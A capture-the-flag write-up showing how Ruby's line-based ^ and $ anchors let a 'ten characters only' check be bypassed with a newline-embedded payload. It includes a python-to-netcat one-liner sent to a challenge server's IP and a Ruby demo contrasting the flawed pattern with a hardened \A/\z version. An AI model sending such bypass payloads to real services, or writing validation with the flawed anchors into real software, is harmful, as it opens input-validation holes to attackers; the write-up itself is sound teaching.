Description
Hi, my name is Ruby. I like converting characters into ascii values and then calculating the sum.
Solution
The problem with Ruby is the way it handles ^ and $ in regular expressions: they match at line boundaries, i.e. immediately before or after a \n (new line), rather than at the start and end of the whole string.
So to exploit this service, all we need to do is to generate a string following these three steps:
- 10 arbitrary characters
- Add a 0x0A (\n)
- Add some more arbitrary data
Now, just send this string and Ruby will happily accept it.
$ python -c 'print "f"*10 + "\x0A" + "fff"' | nc 188.166.133.53 12037
Let me count the ascii values of 10 characters:
Sum is: 1336
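To make the regex behaviour concrete, here is an added Ruby example (not the challenge's own source, which we never see) that models the kind of check the service presumably applies: a "10 characters only" pattern written with ^/$ next to the same pattern anchored with \A/\z, plus the byte sum the service reports. The character class, the function names and the payload values are assumptions for illustration.

```ruby
# Added example: a model of a length-10 input check in Ruby, in its
# vulnerable and hardened forms. Not the challenge's own code.

# Vulnerable form: in Ruby, ^ and $ anchor to line boundaries, so a string
# containing "\n" passes as long as one of its lines matches on its own.
VULNERABLE_RE = /^[a-zA-Z0-9]{10}$/

# Hardened form: \A and \z anchor to the start and end of the whole string,
# so the embedded newline and the trailing data are no longer ignored.
HARDENED_RE = /\A[a-zA-Z0-9]{10}\z/

# Constructed inputs: a benign 10-character string and the bypass payload
# (10 chars + 0x0A + extra data), mirroring the writeup's python one-liner.
BENIGN  = "f" * 10
PAYLOAD = "f" * 10 + "\x0A" + "fff"

# Returns true when the whole input is accepted by the given pattern.
def valid_input?(str, re)
  !(str =~ re).nil?
end

# Returns the substring the pattern actually matched, or nil. For the
# vulnerable pattern this shows that only the first line was validated.
def matched_part(str, re)
  str[re]
end

# What the service does with accepted input: sum the byte (ASCII) values.
def ascii_sum(str)
  str.bytes.sum
end

if __FILE__ == $0
  [VULNERABLE_RE, HARDENED_RE].each do |re|
    puts "#{re.inspect}:"
    [BENIGN, PAYLOAD].each do |input|
      puts "  #{input.inspect} accepted=#{valid_input?(input, re)} " \
           "matched=#{matched_part(input, re).inspect} sum=#{ascii_sum(input)}"
    end
  end
end
```

With the vulnerable pattern the payload is accepted because ^ matches at offset 0 and $ matches just before the \n, so only "ffffffffff" is ever checked; the hardened pattern rejects it. The sum of the full payload (10 × 'f' = 1020, plus 10 for the newline, plus 306 for "fff") is 1336, which is exactly what the service printed above.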
Flag: IW{RUBY_R3G3X_F41L}